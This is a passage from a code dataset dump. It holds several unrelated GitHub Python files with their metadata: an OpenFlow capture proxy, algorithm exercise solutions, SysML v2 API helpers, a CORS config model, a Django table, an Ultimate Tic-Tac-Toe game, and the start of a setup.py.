{}\".format(str(e)))\n except ConnectionResetError as e:\n self.logger.error(\"Failed to read: {}\".format(str(e)))\n except Exception as e:\n self.logger.error(\"Failed to read: {}\".format(str(e)))\n raise\n finally:\n self.logger.info(\"Close the connection and do exit processing\")\n if peername in self.switches:\n self.switches.remove(peername)\n if len(self.switches) == 0:\n self.channel_manager.has_switch_join = False\n writer.close()\n\n async def send_to_switch(self, writer, data):\n \"\"\"send data to switch if queue has data\n\n Args:\n writer (asyncio.StreamWriter) :\n data (bytes) : data from controller\n\n Returns:\n\n \"\"\"\n try:\n if not writer.is_closing():\n writer.write(data)\n await writer.drain()\n self.logger.debug(\"sent data to switch: {}\".format(data))\n else:\n self.logger.debug(\"channel is closed\")\n except ConnectionResetError as e:\n self.logger.info(\"Connection reset: {}\".format(str(e)))\n\n\nclass ControllerHandler:\n \"\"\"client communicating with controller\n\n Attributes:\n host (str) :\n port (int) :\n loop (asyncio.AbstractEventLoop) :\n channel_manager (ChannelManager) :\n \"\"\"\n\n def __init__(self, host, port, loop, channel_manager):\n \"\"\"init SwitchHandler\n\n Args:\n host (str) : controller ip address\n port (int) : controller listen port\n loop (asyncio.AbstractEventLoop) : event loop\n channel_manager (ChannelManager) : channel manager\n \"\"\"\n self.host = host\n self.port = port\n self.loop = loop\n self.channel_manager = channel_manager\n self.logger = getLogger(\"ofcapture.\" + __name__)\n\n self.controllers = set()\n\n async def open_connection(self, channel):\n \"\"\"try to connect to controller\n\n Args:\n channel (Channel) :\n\n Returns:\n asyncio.StreamWriter or None : if succeeded to connect, return writer, else None\n \"\"\"\n try:\n reader, writer = await asyncio.open_connection(host=self.host, port=self.port, loop=self.loop)\n asyncio.ensure_future(self.handle_controller(reader, writer, channel))\n except ConnectionRefusedError as e:\n self.logger.error(\"Failed to connect to controller : {}\".format(str(e)))\n return None\n else:\n return writer\n\n async def handle_controller(self, reader, writer, channel):\n \"\"\"handle controller connection\n\n Args:\n reader (asyncio.StreamReader) :\n writer (asyncio.StreamWriter) :\n channel (Channel) :\n \"\"\"\n peername = writer.get_extra_info('peername')\n self.logger.info(\"connected Controller {}\".format(peername))\n self.controllers.add(peername)\n self.channel_manager.has_controller_join = True\n try:\n while True:\n self.logger.debug(\"waiting data ......\")\n data = await reader.read(64000)\n self.logger.debug(\"read {}\".format(data))\n if not data:\n self.logger.debug(\"no data from controller read\")\n break\n if not channel.is_closing():\n await channel.send_to_switch(data)\n else:\n self.logger.debug(\"the channel is close\")\n if channel.controller_writer is not None:\n break\n except Exception as e:\n self.logger.error(\"Failed to read: {}\".format(str(e)))\n raise\n finally:\n self.logger.info(\"Close the connection and do exit processing\")\n if peername in self.controllers:\n self.controllers.remove(peername)\n if len(self.controllers) == 0:\n self.channel_manager.has_controller_join = False\n writer.close()\n\n async def send_to_controller(self, writer, data):\n \"\"\"send data to controller if queue has data\n\n Args:\n writer (asyncio.StreamWriter) :\n data (bytes) :\n \"\"\"\n try:\n if not writer.is_closing():\n writer.write(data)\n await writer.drain()\n self.logger.debug(\"sent data to controller: {}\".format(data))\n else:\n self.logger.debug(\"channel is closed\")\n except ConnectionResetError as e:\n self.logger.info(\"Connection reset: {}\".format(str(e)))\n except Exception as e:\n self.logger.error(\"Connection error: {}\".format(str(e)))\n raise e\n","repo_name":"shu1r0/ofcapture","sub_path":"proxy/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":15160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"22556507461","text":"# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @author: SaltFish\n# @file: 60n个骰子的点数.py\n# @date: 2020/07/24\n\"\"\"\n把n个骰子扔在地上,所有骰子朝上一面的点数之和为s。输入n,打印出s的所有可能的值出现的概率。\n\n你需要用一个浮点数数组返回答案,其中第 i 个元素代表这 n 个骰子所能掷出的点数集合中第 i 小的那个的概率。\n\n示例 1:\n\n输入: 1\n输出: [0.16667,0.16667,0.16667,0.16667,0.16667,0.16667]\n示例 2:\n\n输入: 2\n输出: [0.02778,0.05556,0.08333,0.11111,0.13889,0.16667,0.13889,0.11111,0.08333,0.05556,0.02778]\n\n动态规划\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def twoSum(self, n: int) -> List[float]:\n dp = [[0 for _ in range(6 * n + 1)] for _ in range(n + 1)]\n for i in range(1, 7):\n dp[1][i] = 1\n\n # 有i个骰子\n for i in range(2, n + 1):\n # i个骰子之和的数值\n for j in range(i, i * 6 + 1):\n # 当前骰子的数值\n for k in range(1, 7):\n if j >= k + 1:\n dp[i][j] += dp[i - 1][j - k]\n total, res = pow(6, n), []\n for i in range(n, n * 6 + 1):\n res.append(dp[n][i] * 1.0 / total)\n return res\n\n def twoSum_better(self, n: int) -> List[float]:\n dp = [0 for _ in range(6 * n + 1)] # 索引0不取,后面取到最大索引6*n\n for i in range(1, 7): # 初始化do,第一轮的抛掷\n dp[i] = 1\n # 从第二轮抛掷开始算\n for i in range(2, n + 1):\n # 第二轮抛掷最小和为2,从大到小更新对应的抛掷次数\n for j in range(6 * n, i - 1, -1):\n dp[j] = 0 # 每次投掷要从0更新dp[j]大小,点数和出现的次数要重新计算\n # 每次抛掷的点数\n for k in range(1, 7):\n # 上一轮的最小点数为i-1\n if j - k < i - 1:\n break\n # 根据上一轮来更新当前轮数据\n dp[j] += dp[j - k]\n total, res = pow(6, n), []\n for i in range(n, 6 * n + 1):\n res.append(dp[i] * 1.0 / total)\n return res\n","repo_name":"SaItFish/PySundries","sub_path":"algorithm_questions/LeetCode/剑指Offer/60n个骰子的点数.py","file_name":"60n个骰子的点数.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12552004723","text":"import requests\nimport json\nimport tkinter as tk\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import ttk\nfrom functools import partial\n\n\ndef format_servername(cName):\n if len(cName)>0:\n if cName[len(cName)-1] == '/':\n cName = cName[0:(len(cName)-1)]\n \n if cName.find('http') == -1:\n cName = 'http://' + cName\n \n return cName\n \ndef delete_project(cServerName, cProjectID):\n##Deletion does not work for non-empty projects, so we will just set the name to None in that case\n bSuccess = True\n response = requests.delete(cServerName + \"/projects/\" + cProjectID)\n if response.status_code!=200:\n \n response = requests.get(cServerName + '/projects/' + cProjectID)\n if response.status_code!=200: \n bSuccess = False\n else:\n default_branch_id = response.json().get('defaultBranch').get('@id')\n project_data = {\n \"@type\": \"Project\",\n \"defaultBranch\":{\"@id\": default_branch_id},\n\t \"name\": None}\n\n response = requests.put(cServerName + \"/projects/\"+cProjectID, \n headers={\"Content-Type\": \"application/json\"}, \n data=json.dumps(project_data))\n \n if response.status_code!=200: \n bSuccess = false\n\n return bSuccess\n\n\ndef multi_page_http_get (sUrl):\n # Processes pagination in htttp responses and returns the full data from all \n # pages and the response from getting the last page\n response = requests.get(sUrl)\n data = response.json()\n\n # Handle next pages of mutlti-page HTML responses (when the payload is very large)\n while response.headers.get('Link','--NOTFOUND--').find('?page[after]')>-1:\n cLink = response.headers.get('Link')\n iPos = cLink.find(',')\n if iPos > -1:\n cLink = cLink[0:iPos]\n cNextPageLink = cLink.replace('<','').replace('; rel=\"next\"','').replace('; rel=\"prev\"','').replace('>','')\n response = requests.get(cNextPageLink)\n if response.status_code == 200:\n data = data + response.json()\n else:\n break\n \n return response, data\n\n\ndef read_full_repository(cServerName, cProjectID):\n# This function has been created to demonstrate the handling\n# of multiple HTML response pages.\n#\n# Normally, this function should not be used, but queries \n# for subsets of the repository should be used instead.\n bSuccess = True\n data = []\n try:\n response = requests.get(cServerName + \"/projects/\" + cProjectID)\n except requests.exceptions.ConnectionError:\n bSuccess = False\n cErrorMessage = 'Error: Could not connect to server'\n print(cErrorMessage)\n\n \n if bSuccess and response.status_code!=200:\n bSuccess = False\n cErrorMessage = 'Error: Could not find project on stated host'\n print('Error: Could not find project on stated host')\n\n \n if bSuccess:\n data = response.json()\n oDefaultBranch = data.get('defaultBranch')\n sDefaultBranchId=oDefaultBranch.get('@id')\n \n if str(type(oDefaultBranch)) == \"\":\n bSuccess = False\n cErrorMessage = 'Error: No default branch.'\n print (cErrorMessage)\n \n if bSuccess:\n response = requests.get(cServerName + \"/projects/\" + cProjectID + \"/branches/\" + sDefaultBranchId)\n data = response.json()\n oHeadCommit = data.get('head')\n if str(type(oHeadCommit)) == \"\":\n bSuccess = False\n cErrorMessage = 'Error: No commit found.'\n print (cErrorMessage)\n else:\n sHeadCommit = oHeadCommit.get('@id')\n\n\n data = []\n if bSuccess:\n response, data = multi_page_http_get(cServerName + \"/projects/\" + cProjectID + \"/commits/\"+sHeadCommit+\"/elements\")\n\n return data\n\ndef run_query_for_elementtyp(cElementType, cServerName, cProjectID):\n qresponse_json=json.dumps('')\n qinput = {\n '@type':'Query',\n 'select': ['name','@id','@type','owner'],\n 'where': {\n '@type': 'CompositeConstraint',\n 'operator': 'and',\n 'constraint': [\n {\n '@type': 'PrimitiveConstraint',\n 'inverse': False,\n 'operator': '=',\n 'property': '@type',\n 'value': cElementType\n }\n ]\n }\n }\n\n payload = json.dumps(qinput)\n qurl = f\"{cServerName}/projects/{cProjectID}/query-results\"\n qresponse = requests.post(qurl, json=qinput)\n if qresponse.status_code == 200:\n qresponse_json = qresponse.json()\n\n return qresponse_json\n \ndef processProjectSelection(listWindow,theCombo,cProjectID):\n selectedProject = theCombo.get()\n posOpeningParenthesis = selectedProject.find('(')\n posClosingParenthesis = selectedProject.find(')')\n cProjectID.set(selectedProject[(posOpeningParenthesis+1):posClosingParenthesis])\n listWindow.destroy()\n\n \ndef selectproject(cProjectID, cServerName):\n tdata = []\n cProjectID.set(\"\")\n cProjectID.set(\"\")\n try:\n response, data = multi_page_http_get(format_servername(cServerName.get()) + \"/projects\")\n\n for currentRecord in data:\n if str(currentRecord.get('name'))!=\"None\":\n\t tdata.append(currentRecord.get(\"name\") + \" (\" + currentRecord.get(\"@id\") + \")\" )\n except requests.exceptions.ConnectionError:\n cProjectID.set(\"Cannot connect to server.\")\n \n if len(tdata)>0:\n listWindow = Tk()\n listWindow.title(\"Project Selection\")\n frm = ttk.Frame(listWindow)\n frm.grid(row=0, column=0, columnspan=4)\n ttk.Label(frm, text=\"Select project\").grid(column=0, row=0)\n theCombo=ttk.Combobox(frm, values=tdata, width = 100)\n theCombo.grid(column=1, row=1)\n ttk.Button(frm, text=\"OK\", command=partial(processProjectSelection,listWindow,theCombo,cProjectID)).grid(column=3, row=2)\n ttk.Button(frm, text=\"Cancel\", command=listWindow.destroy).grid(column=2, row=2)\n\n listWindow.mainloop() \n\ndef dictionary_payload_partusage(element_id, name = None, quali_name = None, owner = None, owning = None):\n dictionary_payload_partusage = {\n \"payload\": {\n '@type': 'PartUsage',\n '@id': element_id,\n 'elementId': element_id,\n 'name': name,\n 'owner': owner,\n 'owningMembership': owning,\n 'owningNamespace': owner,\n 'owningRelationship': owning,\n 'qualifiedName': quali_name\n },\n \"identity\": {\"@id\": element_id}\n }\n return dictionary_payload_partusage\n\ndef dictionary_payload_owningmembership(element_id, member_element, memberId, owned_member_element, owned_member_element_id, target, name, owner):\n dictionary_payload_owningmembership = {\n \"payload\": {'@type': 'OwningMembership',\n '@id': element_id,\n 'elementId': element_id,\n 'memberElement': member_element,\n 'memberElementId': memberId,\n 'memberName': name,\n 'membershipOwningNamespace': owner,\n 'ownedMemberElement': owned_member_element ,\n 'ownedMemberElementId': owned_member_element_id,\n 'ownedMemberName': name,\n 'ownedRelatedElement': [owned_member_element],\n 'owningRelatedElement': owner,\n 'relatedElement': [owner, owned_member_element],\n 'source': [owner],\n 'target': [target]\n },\n \"identity\": {\"@id\": element_id}\n }\n return dictionary_payload_owningmembership\n\ndef dictionary_payload_package(element_id, name = None, quali_name = None, member = None, membership = None ):\n dictionary_payload_package = {\n \"payload\": {'@type': 'Package',\n '@id': element_id,\n 'elementId': element_id,\n 'member': member,\n 'membership': membership,\n 'name': name,\n 'ownedElement': member,\n 'ownedMember': member,\n 'ownedMembership': membership,\n 'ownedRelationship': membership,\n 'qualifiedName': quali_name\n },\n \"identity\": {\"@id\": element_id}\n }\n return dictionary_payload_package\n\ndef copy_elements(source_host, source_id, target_host, target_id):\n \n rep = read_full_repository(source_host, source_id)\n \n rep_t = []\n for i in range(len(rep)):\n rep_t.append({\"payload\": rep[i],\n \"identity\": {\"@id\": rep[i]['@id']}})\n \n commit_body1 = '{\"change\":' + json.dumps(rep_t) + '}'\n response = requests.post(target_host + \"/projects/\" +target_id+ \"/commits\", headers={\"Content-Type\": \"application/json\"}, data = commit_body1)\n \n if response.status_code != 200:\n return False , response.json()\n else:\n return True , response.json()\n\ndef dictionary_payload_dependency(element_id, client, owner, membership, quali_name, target):\n dictionary_payload_dependency = {\n \"payload\": {'@type': 'Dependency',\n '@id': element_id,\n 'client': [client],\n 'elementId': element_id,\n 'owner': owner,\n 'owningMembership': membership,\n 'owningNamespace': owner,\n 'owningRelationship': membership,\n 'qualifiedName': quali_name,\n 'relatedElement': [client, target],\n 'source': [client],\n 'supplier': [target],\n 'target': [target]\n },\n \"identity\": {\"@id\": element_id}\n }\n return dictionary_payload_dependency","repo_name":"GfSE/fas4sysmlv2","sub_path":"src/core/fas4sysmlv2API_helpers.py","file_name":"fas4sysmlv2API_helpers.py","file_ext":"py","file_size_in_byte":10171,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"28999528142","text":"from __future__ import print_function\n\nimport json\n\n\nclass FDSCORSConfig(dict):\n '''\n cors config like this:\n\n {\n \"rules\": [\n {\n \"id\": \"0\",\n \"allowOrigin\":\"*.example.com\"\n },\n {\n \"id\": \"1\",\n \"allowOrigin\":\"*\"\n }\n ]\n }\n '''\n\n def __init__(self, json={}):\n dict.__init__(self, json)\n self._rules = []\n for rule in self.get('rules', []):\n self._rules.append(FDSCORSRule(rule))\n self['rules'] = self._rules\n\n @property\n def rules(self):\n return self._rules\n\n def get_rule_by_id(self, id):\n for rule in self.rules:\n if rule.id == id:\n return rule\n return None\n\nclass FDSCORSRule(dict):\n def __init__(self, json = {}):\n dict.__init__(self, json)\n\n @property\n def id(self):\n return self.get('id', None)\n\n @id.setter\n def id(self, id):\n self['id'] = id\n\n @property\n def allowOrigin(self):\n return self.get('allowOrigin', None)\n\n @allowOrigin.setter\n def allowOrigin(self, allowOrigin):\n self['allowOrigin'] = allowOrigin\n\n\n\nif __name__ == '__main__':\n cors_config = FDSCORSConfig()\n rule1 = FDSCORSRule()\n rule1.allowOrigin = '*.example.com'\n\n print(json.dumps(rule1, sort_keys=True))\n\n cors_config.rules.append(rule1)\n\n print(json.dumps(cors_config, sort_keys=True))\n\n cors_config.rules.append(rule1)\n print(json.dumps(cors_config, sort_keys=True))\n\n jsonstr = ''' {\n \"rules\": [\n {\n \"id\": \"0\",\n \"allowOrigin\":\"*.example.com\"\n },\n {\n \"id\": \"1\",\n \"allowOrigin\":\"*\"\n }\n ]\n }\n '''\n print(jsonstr)\n print(json.dumps(json.loads(jsonstr), sort_keys=True))\n print(json.dumps(FDSCORSConfig(json.loads(jsonstr)), sort_keys=True))\n","repo_name":"XiaoMi/galaxy-fds-sdk-python","sub_path":"fds/model/fds_cors.py","file_name":"fds_cors.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"77"} +{"seq_id":"10863949016","text":"import django_tables2 as tables\nfrom django.template.defaultfilters import truncatechars\nfrom django.utils.html import format_html\nfrom django_tables2.utils import A\n\nfrom .models import Sample\nfrom .utils import humansize\n\n\nclass SampleTable(tables.Table):\n edit = tables.LinkColumn(\n \"label\", text=\"Edit Labels\", args=[A(\"pk\")], orderable=False\n )\n labels = tables.Column(accessor=\"pk\", orderable=True)\n\n class Meta:\n model = Sample\n template_name = \"django_tables2/bootstrap4.html\"\n attrs = {\"class\": \"table table-sm table-bordered\"}\n fields = (\n \"edit\",\n \"labels\",\n \"url\",\n \"freeze_time\",\n \"freeze_software\",\n \"page_size\",\n \"notes\",\n )\n\n def render_labels(self, value, record):\n default = format_html('-')\n if hasattr(record, \"labeled_sample\"):\n # This was a one-to-one relationship but is now a FK relationship so there can be more than 1\n # LabeledSample for the Sample. However the default filtering is superseded_by=None so only 1 is returned.\n if record.labeled_sample.all().exists():\n labeled_elements = (\n record.labeled_sample.all().first().labeled_elements.all()\n )\n labels = labeled_elements.values_list(\n \"label__slug\", flat=True\n ).distinct()\n if labels:\n label_links = [\n f'{label}' for label in labels\n ]\n return format_html(\", \".join(label_links))\n return default\n\n def order_labels(self, queryset, is_descending):\n queryset = queryset.order_by((\"-\" if is_descending else \"\") + \"nlabels\")\n return (queryset, True)\n\n def render_page_size(self, value, record):\n return humansize(value)\n\n def render_url(self, value, record):\n return f\"{truncatechars(value, 80)}\"\n","repo_name":"mozilla-applied-ml/fta","sub_path":"fta/samples/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"1154668336","text":"import sys\nsys.stdin = open(\"input.txt\", 'r')\ninput = sys.stdin.readline\n\nimport itertools\n\nN = int(input().rstrip())\nS = []\nfor i in range(N):\n S.append(input().rstrip())\n\nfor a, b in itertools.combinations_with_replacement(S, 2):\n if a == b[::-1]:\n print(len(a), a[len(a)//2])","repo_name":"hjyoon/baekjoon-answers","sub_path":"_9000/9933.py","file_name":"9933.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71321038968","text":"\nimport numpy as np\nfrom colorama import Back\nfrom .UT3Logic import Board, b_sz\nfrom Arena import numPlayers\nfrom Game import Game\nimport sys\nsys.path.append('..')\n\n\nclass UT3Game(Game):\n def __init__(self, n=b_sz):\n self.n = n\n\n def getArray(self, b):\n macro = np.tile(b.macro, (self.n, self.n))\n return np.stack((b.pieces, macro))\n\n def getBoardChannels(self):\n return 2\n\n def getBoardSize(self):\n return self.n**2, self.n**2\n\n def getActionSize(self):\n return self.n**4\n\n def getInitBoard(self):\n b = Board(self.n)\n return self.getArray(b)\n\n def getNextState(self, board, player, action):\n b = Board(self.n)\n b.pieces = np.copy(board[0])\n b.macro = np.copy(board[1, :b_sz, :b_sz])\n move = int(action/self.n**2), action % self.n**2\n b.execute_move(move, player)\n if player+1 <= numPlayers:\n player = player+1\n else:\n player = 1\n return self.getArray(b), player\n\n def getValidMoves(self, board, player):\n valid = [0]*self.getActionSize()\n b = Board(self.n)\n b.pieces = np.copy(board[0])\n b.macro = np.copy(board[1, :b_sz, :b_sz])\n for x, y in b.get_legal_moves(player):\n valid[x*self.n**2 + y] = 1\n return np.array(valid)\n\n def getGameEnded(self, board, player):\n # Return 0 if not ended, 1 if player 1 won, -1 if player 1 lost.\n # Return small non-zero value for a draw.\n b = Board(self.n)\n b.pieces = np.copy(board[0])\n b.macro = np.copy(board[1, :b_sz, :b_sz])\n\n insides = b.getInnerBoards(b.macro)\n\n for i in range(len(insides)):\n for player in range(1, numPlayers+1):\n if b.is_win(player, insides[i]):\n return player\n if b.is_full():\n return b.draw\n return 0\n\n def getCanonicalForm(self, board, player):\n arr = []\n arr.append(np.where(board[0] > 0, (board[0] % numPlayers)+1, board[0]))\n arr.append(board[1])\n # np.where((board >= 1.0) & (board < numPlayers+1), (board%numPlayers)+1 , board)\n return np.array(arr)\n\n def getSymmetries(self, board, pi):\n # rotate, mirror\n assert(len(pi) == self.getActionSize()) # 1 for pass\n pi_board = np.reshape(pi, self.getBoardSize())\n sym, x, y = [], -2, -1\n\n for rot in range(4):\n for flip in True, False:\n newB = np.rot90(board, rot, (x, y))\n newPi = np.rot90(pi_board, rot, (x, y))\n if flip:\n newB = np.flip(newB, y)\n newPi = np.flip(newPi, y)\n sym.append((newB, list(newPi.ravel())))\n return sym\n\n def stringRepresentation(self, board):\n return board.tostring()\n\n\ndef display(board, indent=' '):\n b = Board(b_sz)\n b.pieces = np.copy(board[0])\n b.macro = np.copy(board[1, :b_sz, :b_sz])\n\n top = ' '\n sep = '|'\n msep = '‖ '\n rowSep = ' ' + ('---' + '+---'*(b_sz-1) + '‖') * \\\n (b_sz-1) + '---' + '+---'*(b_sz-1)\n rows = []\n idex = []\n jdex = []\n windex = []\n minirows = []\n mw = []\n\n for i in range(b_sz):\n for j in range(b_sz):\n bp = b.macro[i][j]\n\n if bp in range(1, 4):\n idex.append(i)\n jdex.append(j)\n mw.append(bp)\n\n windex.append(tuple((i, j)))\n\n print('')\n\n for x in range(b_sz):\n for y in range(b_sz):\n adder = ''\n\n for xX in range(b_sz):\n\n minirow = ''\n\n for yY in range(b_sz):\n\n if ((y*b_sz+yY) % (b_sz) == b_sz-1):\n if (y == b_sz-1) & (yY == b_sz-1):\n sep = ' '\n else:\n sep = '‖'\n else:\n sep = '|'\n\n if (x, y) in windex:\n dex = windex.index((x, y))\n\n mask = mw[dex]\n\n if mask == 1:\n adder = Back.RED + str(b.pieces[x*b_sz+xX][y*b_sz+yY]).replace(\n '1.0', ' X ').replace('2.0', ' O ').replace('3.0', ' ^ ') + Back.RESET\n elif mask == 2:\n adder = Back.BLUE + str(b.pieces[x*b_sz+xX][y*b_sz+yY]).replace(\n '1.0', ' X ').replace('2.0', ' O ').replace('3.0', ' ^ ') + Back.RESET\n elif mask == 3:\n adder = Back.GREEN + str(b.pieces[x*b_sz+xX][y*b_sz+yY]).replace(\n '1.0', ' X ').replace('2.0', ' O ').replace('3.0', ' ^ ') + Back.RESET\n\n else:\n temp = b.pieces[x*b_sz+xX][y*b_sz+yY]\n\n if temp == 1.0:\n adder = Back.RED + \\\n str(b.pieces[x*b_sz+xX][y*b_sz+yY]\n ).replace('1.0', ' X ') + Back.RESET\n elif temp == 2.0:\n adder = Back.BLUE + \\\n str(b.pieces[x*b_sz+xX][y*b_sz+yY]\n ).replace('2.0', ' O ') + Back.RESET\n elif temp == 3.0:\n adder = Back.GREEN + \\\n str(b.pieces[x*b_sz+xX][y*b_sz+yY]\n ).replace('3.0', ' ^ ') + Back.RESET\n else:\n adder = str(b.pieces[x*b_sz+xX][y*b_sz+yY])\n\n minirow += adder + sep\n\n minirows.append(minirow)\n\n t = 0\n\n for r in range(b_sz**2):\n if r < 10:\n row = ' ' + str(r) + ' '\n\n if r % b_sz == b_sz-1:\n top += str(r) + ' ' + msep\n else:\n top += str(r) + ' | '\n else:\n row = str(r) + ' '\n\n if r % b_sz == b_sz-1:\n if r == (b_sz**2)-1:\n top += str(r)\n else:\n top += str(r) + msep\n else:\n top += str(r) + '| '\n\n for c in range(b_sz):\n\n t = (r*b_sz)+(c*b_sz)-(r % b_sz)*(b_sz-1)\n\n row += minirows[t]\n \"\"\"if r in range(b_sz):\n \t\t\tt = r+c*b_sz\n \t\t\trow += minirows[t]\n \t\telif r in range(b_sz, b_sz*(b_sz-1)):\n \t\t\tt = r+(b_sz**2)+c*b_sz-3\n \t\t\trow += minirows[t]\n \t\telse:\n \t\t\tt = r+(b_sz**2)+(c*b_sz)+b_sz\n \t\t\trow += minirows[t]\"\"\"\n\n rows.append(row)\n\n if r % b_sz == b_sz-1:\n if (r != 0) & (r != (b_sz**2)-1):\n rows.append(' ' + ('='*((4*b_sz)-1) + '#')\n * (b_sz-1) + '='*((4*b_sz)-1))\n else:\n rows.append(rowSep)\n\n print(top)\n\n print('')\n\n for b in range(len(rows)):\n print(rows[b].replace('0.0', ' . '))\n\n \"\"\"for rn in range(b_sz**2):\n \t row = ''\n \t sep = '|'\n \t mSep = '‖ '\n \t \n \t if rn < 10:\n \t \trow += ' ' + str(rn) + ' '\n \t \t\n \t \tif rn%b_sz == b_sz-1:\n \t \t\ttop += str(rn) + ' ' + mSep\n \t \telse:\n \t \t\ttop += str(rn) + ' | '\n \t else:\n \t \trow += str(rn) + ' '\n \t \t\n \t \tif rn%b_sz == b_sz-1:\n \t \t\tif rn == (b_sz**2)-1:\n \t \t\t\ttop += str(rn)\n \t \t\telse:\n \t \t\t\ttop += str(rn) + mSep\n \t \telse:\n \t \t\ttop += str(rn) + '| '\n \t \n \t for cn in range(b_sz**2):\n \t \tif cn%b_sz == b_sz-1:\n \t \t\tif cn==(b_sz**2)-1:\n \t \t\t\tsep = ''\n \t \t\telse:\n \t \t\t\tsep = '‖'\n \t \telse:\n \t \t\tsep = '|'\n \t\n \t \tif (idex > 0) & (jdex > 0):\n \t \t\tif (rn in range(b_sz*idex, b_sz*idex+b_sz)) & (cn in range(b_sz*jdex, b_sz*jdex+b_sz)):\n \t \t\t\t# print(\"({}, {}) {}\".format(idex, jdex, mw))\n \t \t\t\tif mw == 1:\n \t \t\t\t\trow += Back.RED + str(b.pieces[rn, cn]).replace('1.0', ' X ').replace('2.0', ' O ').replace('3.0', ' ^ ') + Back.RESET + sep\n \t \t\t\telif mw == 2:\n \t \t\t\t\trow += Back.BLUE + str(b.pieces[rn, cn]).replace('2.0', ' O ').replace('3.0', ' ^ ').replace('1.0', ' X ') + Back.RESET + sep\n \t \t\t\telif mw == 3:\n \t \t\t\t\trow += Back.GREEN + str(b.pieces[rn, cn]).replace('3.0', ' ^ ').replace('2.0', ' O ').replace('1.0', ' X ') + Back.RESET + sep\n \t \t\telse:\n \t \t\t\ttemp = b.pieces[rn, cn]\n \t \t\t\t\n \t \t\t\tif temp == 1.0:\n \t \t\t\t\trow += str(b.pieces[rn, cn]).replace('1.0', Back.RED + ' X ' + Back.RESET) + sep\n \t \t\t\telif temp == 2.0:\n \t \t\t\t\trow += str(b.pieces[rn, cn]).replace('2.0', Back.BLUE + ' O ' + Back.RESET) + sep\n \t \t\t\telif temp == 3.0:\n \t \t\t\t\trow += str(b.pieces[rn, cn]).replace('3.0', Back.GREEN + ' ^ ' + Back.RESET) + sep\n \t \t\t\telse:\n \t \t\t\t\trow += str(b.pieces[rn, cn]) + sep\n \t \telse:\n \t \t\ttemp = b.pieces[rn, cn]\n \t \t\t\t\n \t \t\tif temp == 1.0:\n \t \t\t\trow += str(b.pieces[rn, cn]).replace('1.0', Back.RED + ' X ' + Back.RESET) + sep\n \t \t\telif temp == 2.0:\n \t \t\t\trow += str(b.pieces[rn, cn]).replace('2.0', Back.BLUE + ' O ' + Back.RESET) + sep\n \t \t\telif temp == 3.0:\n \t \t\t\trow += str(b.pieces[rn, cn]).replace('3.0', Back.GREEN + ' ^ ' + Back.RESET) + sep\n \t \t\telse:\n \t \t\t\trow += str(b.pieces[rn, cn]) + sep\n \n \t if rn%b_sz == 0:\n \t\t if rn != 0:\n \t\t \trows.append(' ' + ('='*((b_sz**2)-1) + '#')*(b_sz-1) + '='*((4*b_sz)-1))\n \t else:\n \t \t rows.append(rowSep)\n \t\n \t rows.append(row) #replace('1.0', Back.RED + ' X ' + Back.RESET).replace('2.0', Back.BLUE + ' O ' + Back.RESET).replace('3.0', Back.GREEN + ' ^ ' + Back.RESET).replace('0.0',' ')) #replace('1.0', ' X ').replace('2.0', ' O ').replace('3.0', ' ^ '))\n \t \n print(top)\n \n for i in range(len(rows)):\n \tprint(rows[i].replace('0.0', ' . '))\"\"\"\n\n \"\"\"print('')\n # print(indent + ' 0 | 1 | 2 ‖ 3 | 4 | 5 ‖ 6 | 7 | 8')\n topRow = ' '\n for i in range(b_sz):\n \tfor j in range(b_sz):\n \t\ttopRow += str(i*b_sz + j)\n \t\tif i*b_sz + j < 10:\n \t\t\ttopRow += ' '\n \t\tif j != b_sz - 1:\n \t\t\ttopRow += '| '\n \t\telif i != b_sz - 1:\n \t\t\ttopRow += '‖ '\n print(indent + topRow)\n print('')\n \n for n, row in enumerate(board[0]):\n if n:\n if n % b_sz:\n sep = '---' + '+---'*(b_sz-1)\n \n fullPrint = ' - '\n for i in range(b_sz):\n \tfullPrint += sep\n \tif i != b_sz - 1:\n \t\tfullPrint += '‖'\n print(indent + fullPrint)\n # print(indent + '- ' + sep + '‖' + sep + '‖' + sep)\n else:\n sep = '='*(4*b_sz - 1)\n \n fullPrint = ' = '\n for i in range(b_sz):\n \tfullPrint += sep\n \tif i != b_sz - 1:\n \t\tfullPrint += '#'\n print(indent + fullPrint)\n # print(indent + '= ' + sep + '#' + sep + '#' + sep)\n row = '‖'.join('|'.join(map(str, map(int, row[i:i+b_sz]))) for i in range(0, len(row), b_sz))\n adjustedIndent = indent\n if n < 10:\n \tadjustedIndent += ' '\n print(adjustedIndent + str(n) + ' ' + row.replace('1', Back.BLUE + ' O ' + Back.RESET).replace('2', Back.RED + ' X ' + Back.RESET).replace('3', Back.GREEN + ' ^ ' + Back.RESET).replace('0',' . '))\"\"\"\n print('')\n","repo_name":"YasmineFA/CS534_Team2","sub_path":"ut3/UT3Game.py","file_name":"UT3Game.py","file_ext":"py","file_size_in_byte":11446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"75152049207","text":"#!/usr/bin/env python3\n\"\"\"Setup downloader-cli\"\"\"\n\nimport io\nfrom setuptools import setup\n\n\nrequirements = [\n 'urllib3>=1.25.6'\n]\n\n\n\nsetup(\n name=\"downloader_cli\",\n version=\"0.3.3\",\n url=\"https://github.com/CS222-UIUC/course-project-group-13\",\n packages=[\"downloader_cli\"],\n classifiers=(\n [\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ]\n ),\n entry_points={\n 'console_scripts': [\n \"dw = downloader_cli.download:main\"\n ]\n },\n 